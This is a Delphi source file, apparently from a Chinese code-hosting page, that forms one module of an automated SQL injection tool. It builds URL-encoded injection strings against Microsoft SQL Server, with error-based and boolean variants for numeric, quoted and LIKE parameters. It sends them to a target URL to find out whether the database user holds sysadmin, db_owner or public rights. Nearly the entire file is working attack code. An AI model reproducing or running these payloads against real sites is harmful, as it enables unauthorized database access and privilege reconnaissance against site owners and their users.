📄 threaduserpower.pas
字号:
unit ThreadUserPower;
interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms;
type
TThreadUserPower = class(TThread)
FURL:string;
private
private
procedure GetUserPower(str_url:string);
function GetURLCode(URL: string): integer;
published
procedure Execute; override;
public
end;
implementation
uses
main_unit,CJdatabase_unit,define_unit,ThreadHttpGet;
//******************************************************************************
procedure TThreadUserPower.Execute;
begin
GetUserPower(FURL);
ThdObjCompleteCount:=ThdObjCompleteCount+1;
end;
//*****************************************************************************
//函数:获取数据库用户的权限
procedure TThreadUserPower.GetUserPower(str_url:string);
var
i :integer;
power:string;
URL:string;
str_ext:string;
IdGetObj:TThreadHttpGet;
begin
{ //判断思路:如果是报错型就用权限值转换成varchar和整数比较,将其值取出来
// 如果是暴力猜解型,就用整数和整数相比}
//对不同的数据库报错类型构造不同的语句
case cjdatabase_unit.Database_methord of
1 : begin
str_ext:='%20And%20(char(94)%2Bcast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))%2Bchar(94))>0';
case Inject_methord of
0: begin
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
2: begin
str_ext:='%20And%20(IS_SRVROLEMEMBER(''sysadmin''))=1';
case Inject_methord of
0: begin
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
end;
//对不同的语句进行不同的判断
case cjdatabase_unit.Database_methord of
0: exit;
1: begin
if define_unit.GetURLMsg(URL)='1' then
begin
power:='sysadmin';
Form_main.suiEdit_power.Text:='SA';
end;
end;
2: begin
if GetURLCode(URL)=200 then
begin
power:='sysadmin';
Form_main.suiEdit_power.Text:='SA';
end;
end;
end;
//判断是否是‘dbo’
if power='' then
begin
case cjdatabase_unit.Database_methord of
1 : begin
str_ext:='%20And%20(char(94)%2Bcast(IS_MEMBER(''db_owner'')%20as%20varchar(1))%2Bchar(94))>0';
case Inject_methord of
0: begin
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
2: begin
str_ext:='%20And%20(IS_MEMBER(''db_owner''))=1';
case Inject_methord of
0: begin
//Application.MessageBox(pchar('该注入地址可能无法注入,未知的注入方式'),'警告',mb_ok+mb_iconinformation);
exit;
end;
1: begin
URL:=str_url+str_ext;
end;
2: begin
URL:=str_url+'''%20'+str_ext+'%20And%20''''=''';
end;
3: begin
URL:=str_url+'%25''%20'+str_ext+'%20And%20''%25''=''';
end;
end;
end;
end;
//对不同的语句进行不同的判断
case cjdatabase_unit.Database_methord of
0: exit;
1: begin
if define_unit.GetURLMsg(URL)='1' then
begin
power:='db_owner';
Form_main.suiEdit_power.Text:='db_owner';
end;
end;
2: begin
if GetURLCode(URL)=200 then
begin
power:='db_owner';
Form_main.suiEdit_power.Text:='db_owner';
end;
end;
end;
end; //end of if
if power='' then
begin
power:='public';
Form_main.suiEdit_power.Text:='public';
end;
end;
//*****************************************************************************
function TThreadUserPower.GetURLCode(URL: string): integer;
var
IdGetObj:TThreadHttpGetHead;
begin
try
Result := 0;
IdGetObj:=TThreadHttpGetHead.Create(true);
IdGetObj.TimeOut:=TimeOut;//timeout30秒
IdGetObj.FURL:=URL;
IdGetObj.Success:=false;
IdGetObj.Resume;
while not IdGetObj.Success do
begin
application.ProcessMessages;
sleep(50);
end;
Result :=IdGetObj.iCode;
finally
IdGetObj.Free;
IdGetObj:=nil;
end;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -